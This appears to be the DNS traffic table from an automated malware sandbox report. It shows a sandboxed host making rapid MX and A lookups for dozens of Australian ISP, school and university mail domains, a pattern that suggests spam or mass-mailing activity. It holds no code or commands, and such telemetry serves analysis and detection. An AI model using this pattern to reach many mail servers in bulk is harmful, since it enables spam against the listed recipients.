                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.990381956 CET8.8.8.8192.168.2.30x12c3No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.990381956 CET8.8.8.8192.168.2.30x12c3No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.010761976 CET8.8.8.8192.168.2.30x2fd8No error (0)mta7.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.010761976 CET8.8.8.8192.168.2.30x2fd8No error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.010761976 CET8.8.8.8192.168.2.30x2fd8No error (0)mta7.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.010761976 CET8.8.8.8192.168.2.30x2fd8No error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.010761976 CET8.8.8.8192.168.2.30x2fd8No error (0)mta7.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.010761976 CET8.8.8.8192.168.2.30x2fd8No error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.010761976 CET8.8.8.8192.168.2.30x2fd8No error (0)mta7.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.010761976 CET8.8.8.8192.168.2.30x2fd8No error (0)mta7.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.075129032 CET8.8.8.8192.168.2.30xa66eNo error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.098684072 CET8.8.8.8192.168.2.30x656fNo error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.160825968 CET8.8.8.8192.168.2.30x2e2cNo error (0)tpg.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.190465927 CET8.8.8.8192.168.2.30x6d60No error (0)asav.tpg.com.au27.32.32.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.337553978 CET8.8.8.8192.168.2.30x6e16No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.337553978 CET8.8.8.8192.168.2.30x6e16No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.337553978 CET8.8.8.8192.168.2.30x6e16No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.359940052 CET8.8.8.8192.168.2.30xa9f3No error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.359940052 CET8.8.8.8192.168.2.30xa9f3No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.359940052 CET8.8.8.8192.168.2.30xa9f3No error (0)mta6.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.359940052 CET8.8.8.8192.168.2.30xa9f3No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.359940052 CET8.8.8.8192.168.2.30xa9f3No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.359940052 CET8.8.8.8192.168.2.30xa9f3No error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.359940052 CET8.8.8.8192.168.2.30xa9f3No error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.359940052 CET8.8.8.8192.168.2.30xa9f3No error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.401026011 CET8.8.8.8192.168.2.30xc9d3No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.401026011 CET8.8.8.8192.168.2.30xc9d3No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.401026011 CET8.8.8.8192.168.2.30xc9d3No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.437766075 CET8.8.8.8192.168.2.30x8703No error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.437766075 CET8.8.8.8192.168.2.30x8703No error (0)mta7.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.437766075 CET8.8.8.8192.168.2.30x8703No error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.437766075 CET8.8.8.8192.168.2.30x8703No error (0)mta7.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.437766075 CET8.8.8.8192.168.2.30x8703No error (0)mta7.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.437766075 CET8.8.8.8192.168.2.30x8703No error (0)mta7.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.437766075 CET8.8.8.8192.168.2.30x8703No error (0)mta7.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.437766075 CET8.8.8.8192.168.2.30x8703No error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.524976969 CET8.8.8.8192.168.2.30x9d78No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.524976969 CET8.8.8.8192.168.2.30x9d78No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.524976969 CET8.8.8.8192.168.2.30x9d78No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.547283888 CET8.8.8.8192.168.2.30x5cafNo error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.547283888 CET8.8.8.8192.168.2.30x5cafNo error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.547283888 CET8.8.8.8192.168.2.30x5cafNo error (0)mta6.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.547283888 CET8.8.8.8192.168.2.30x5cafNo error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.547283888 CET8.8.8.8192.168.2.30x5cafNo error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.547283888 CET8.8.8.8192.168.2.30x5cafNo error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.547283888 CET8.8.8.8192.168.2.30x5cafNo error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.547283888 CET8.8.8.8192.168.2.30x5cafNo error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.598181009 CET8.8.8.8192.168.2.30x38b6No error (0)mlc.vic.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.598181009 CET8.8.8.8192.168.2.30x38b6No error (0)mlc.vic.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.622242928 CET8.8.8.8192.168.2.30xef0cNo error (0)d100282a.ess.barracudanetworks.com209.222.82.255A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.622242928 CET8.8.8.8192.168.2.30xef0cNo error (0)d100282a.ess.barracudanetworks.com209.222.82.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.622242928 CET8.8.8.8192.168.2.30xef0cNo error (0)d100282a.ess.barracudanetworks.com209.222.82.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.851285934 CET8.8.8.8192.168.2.30xdce7No error (0)melbourneestateagents.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.853498936 CET8.8.8.8192.168.2.30xe453No error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.853498936 CET8.8.8.8192.168.2.30xe453No error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.870842934 CET8.8.8.8192.168.2.30xf6c2No error (0)mail.h-email.net54.69.120.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.870842934 CET8.8.8.8192.168.2.30xf6c2No error (0)mail.h-email.net52.38.197.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.870842934 CET8.8.8.8192.168.2.30xf6c2No error (0)mail.h-email.net54.149.209.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.870842934 CET8.8.8.8192.168.2.30xf6c2No error (0)mail.h-email.net54.189.54.161A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.870842934 CET8.8.8.8192.168.2.30xf6c2No error (0)mail.h-email.net34.212.133.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.870842934 CET8.8.8.8192.168.2.30xf6c2No error (0)mail.h-email.net54.218.19.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.870842934 CET8.8.8.8192.168.2.30xf6c2No error (0)mail.h-email.net54.212.151.52A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.870842934 CET8.8.8.8192.168.2.30xf6c2No error (0)mail.h-email.net35.164.227.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.870842934 CET8.8.8.8192.168.2.30xf6c2No error (0)mail.h-email.net52.34.75.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.870842934 CET8.8.8.8192.168.2.30xf6c2No error (0)mail.h-email.net34.221.92.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.875641108 CET8.8.8.8192.168.2.30x9e81No error (0)asav2.iinet.net.au27.32.32.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.904382944 CET8.8.8.8192.168.2.30x547fNo error (0)tpg.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.930784941 CET8.8.8.8192.168.2.30xf17bNo error (0)asav.tpg.com.au27.32.32.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.949357986 CET8.8.8.8192.168.2.30xd662No error (0)uqconnect.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.990470886 CET8.8.8.8192.168.2.30xb285No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.990470886 CET8.8.8.8192.168.2.30xb285No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.990470886 CET8.8.8.8192.168.2.30xb285No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.014772892 CET8.8.8.8192.168.2.30xcd6No error (0)mta7.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.014772892 CET8.8.8.8192.168.2.30xcd6No error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.014772892 CET8.8.8.8192.168.2.30xcd6No error (0)mta7.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.014772892 CET8.8.8.8192.168.2.30xcd6No error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.014772892 CET8.8.8.8192.168.2.30xcd6No error (0)mta7.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.014772892 CET8.8.8.8192.168.2.30xcd6No error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.014772892 CET8.8.8.8192.168.2.30xcd6No error (0)mta7.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.014772892 CET8.8.8.8192.168.2.30xcd6No error (0)mta7.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.099276066 CET8.8.8.8192.168.2.30x99c8No error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.107686043 CET8.8.8.8192.168.2.30x7924No error (0)uqconnect-edu-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.107686043 CET8.8.8.8192.168.2.30x7924No error (0)uqconnect-edu-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.123441935 CET8.8.8.8192.168.2.30xae7dNo error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.154592037 CET8.8.8.8192.168.2.30x3df3No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.154592037 CET8.8.8.8192.168.2.30x3df3No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.154592037 CET8.8.8.8192.168.2.30x3df3No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.184695959 CET8.8.8.8192.168.2.30x8bffNo error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.184695959 CET8.8.8.8192.168.2.30x8bffNo error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.184695959 CET8.8.8.8192.168.2.30x8bffNo error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.184695959 CET8.8.8.8192.168.2.30x8bffNo error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.184695959 CET8.8.8.8192.168.2.30x8bffNo error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.184695959 CET8.8.8.8192.168.2.30x8bffNo error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.184695959 CET8.8.8.8192.168.2.30x8bffNo error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.184695959 CET8.8.8.8192.168.2.30x8bffNo error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.247100115 CET8.8.8.8192.168.2.30x3ce3No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.247100115 CET8.8.8.8192.168.2.30x3ce3No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.247100115 CET8.8.8.8192.168.2.30x3ce3No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.266307116 CET8.8.8.8192.168.2.30xc17cNo error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.266307116 CET8.8.8.8192.168.2.30xc17cNo error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.266307116 CET8.8.8.8192.168.2.30xc17cNo error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.266307116 CET8.8.8.8192.168.2.30xc17cNo error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.266307116 CET8.8.8.8192.168.2.30xc17cNo error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.266307116 CET8.8.8.8192.168.2.30xc17cNo error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.266307116 CET8.8.8.8192.168.2.30xc17cNo error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.266307116 CET8.8.8.8192.168.2.30xc17cNo error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.336832047 CET8.8.8.8192.168.2.30x3b06No error (0)tpg.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.358274937 CET8.8.8.8192.168.2.30xba86No error (0)asav.tpg.com.au27.32.32.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.461699963 CET8.8.8.8192.168.2.30x523dNo error (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.490951061 CET8.8.8.8192.168.2.30x835aNo error (0)extmail.bpbb.bigpond.com203.36.172.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.490951061 CET8.8.8.8192.168.2.30x835aNo error (0)extmail.bpbb.bigpond.com203.36.137.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.557830095 CET8.8.8.8192.168.2.30x6af6No error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.557830095 CET8.8.8.8192.168.2.30x6af6No error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.577608109 CET8.8.8.8192.168.2.30x2ae2No error (0)asav2.iinet.net.au27.32.32.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.727438927 CET8.8.8.8192.168.2.30x3ce5No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.727438927 CET8.8.8.8192.168.2.30x3ce5No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.727438927 CET8.8.8.8192.168.2.30x3ce5No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.745338917 CET8.8.8.8192.168.2.30x1879No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.745338917 CET8.8.8.8192.168.2.30x1879No error (0)mta6.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.745338917 CET8.8.8.8192.168.2.30x1879No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.745338917 CET8.8.8.8192.168.2.30x1879No error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.745338917 CET8.8.8.8192.168.2.30x1879No error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.745338917 CET8.8.8.8192.168.2.30x1879No error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.745338917 CET8.8.8.8192.168.2.30x1879No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.745338917 CET8.8.8.8192.168.2.30x1879No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.974106073 CET8.8.8.8192.168.2.30x6caNo error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.996972084 CET8.8.8.8192.168.2.30x5e52No error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.024125099 CET8.8.8.8192.168.2.30x981eServer failure (2)acsmail.net.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.061880112 CET8.8.8.8192.168.2.30x3d3eNo error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.065586090 CET8.8.8.8192.168.2.30xe2bNo error (0)postgrads.unisa.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.065586090 CET8.8.8.8192.168.2.30xe2bNo error (0)postgrads.unisa.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.080367088 CET8.8.8.8192.168.2.30x2b6fNo error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.084000111 CET8.8.8.8192.168.2.30xe1d9No error (0)au-smtp-inbound-2.mimecast.com103.13.69.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.084000111 CET8.8.8.8192.168.2.30xe1d9No error (0)au-smtp-inbound-2.mimecast.com124.47.150.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.084000111 CET8.8.8.8192.168.2.30xe1d9No error (0)au-smtp-inbound-2.mimecast.com124.47.150.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.084000111 CET8.8.8.8192.168.2.30xe1d9No error (0)au-smtp-inbound-2.mimecast.com103.13.69.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.115890980 CET8.8.8.8192.168.2.30x2676No error (0)killester.vic.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.115890980 CET8.8.8.8192.168.2.30x2676No error (0)killester.vic.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.115890980 CET8.8.8.8192.168.2.30x2676No error (0)killester.vic.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.115890980 CET8.8.8.8192.168.2.30x2676No error (0)killester.vic.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.115890980 CET8.8.8.8192.168.2.30x2676No error (0)killester.vic.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.115890980 CET8.8.8.8192.168.2.30x2676No error (0)killester.vic.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.115890980 CET8.8.8.8192.168.2.30x2676No error (0)killester.vic.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.170073986 CET8.8.8.8192.168.2.30x1471No error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.180625916 CET8.8.8.8192.168.2.30x7128No error (0)ASPMX.L.GOOGLE.COM108.177.119.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.190776110 CET8.8.8.8192.168.2.30xbe28No error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.321171045 CET8.8.8.8192.168.2.30xfc5fNo error (0)eq.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.349113941 CET8.8.8.8192.168.2.30x8963No error (0)eq-edu-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.349113941 CET8.8.8.8192.168.2.30x8963No error (0)eq-edu-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.433132887 CET8.8.8.8192.168.2.30x8d21No error (0)student.bond.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.433132887 CET8.8.8.8192.168.2.30x8d21No error (0)student.bond.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.454731941 CET8.8.8.8192.168.2.30xecbaNo error (0)mx1.bond.c3s2.iphmx.com68.232.151.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.454731941 CET8.8.8.8192.168.2.30xecbaNo error (0)mx1.bond.c3s2.iphmx.com68.232.151.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.454731941 CET8.8.8.8192.168.2.30xecbaNo error (0)mx1.bond.c3s2.iphmx.com68.232.152.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.454731941 CET8.8.8.8192.168.2.30xecbaNo error (0)mx1.bond.c3s2.iphmx.com68.232.152.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.507450104 CET8.8.8.8192.168.2.30xca65No error (0)optus.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.526853085 CET8.8.8.8192.168.2.30x1101No error (0)chem.mq.edu.auMX (Mail exchange)IN (0x0001)false
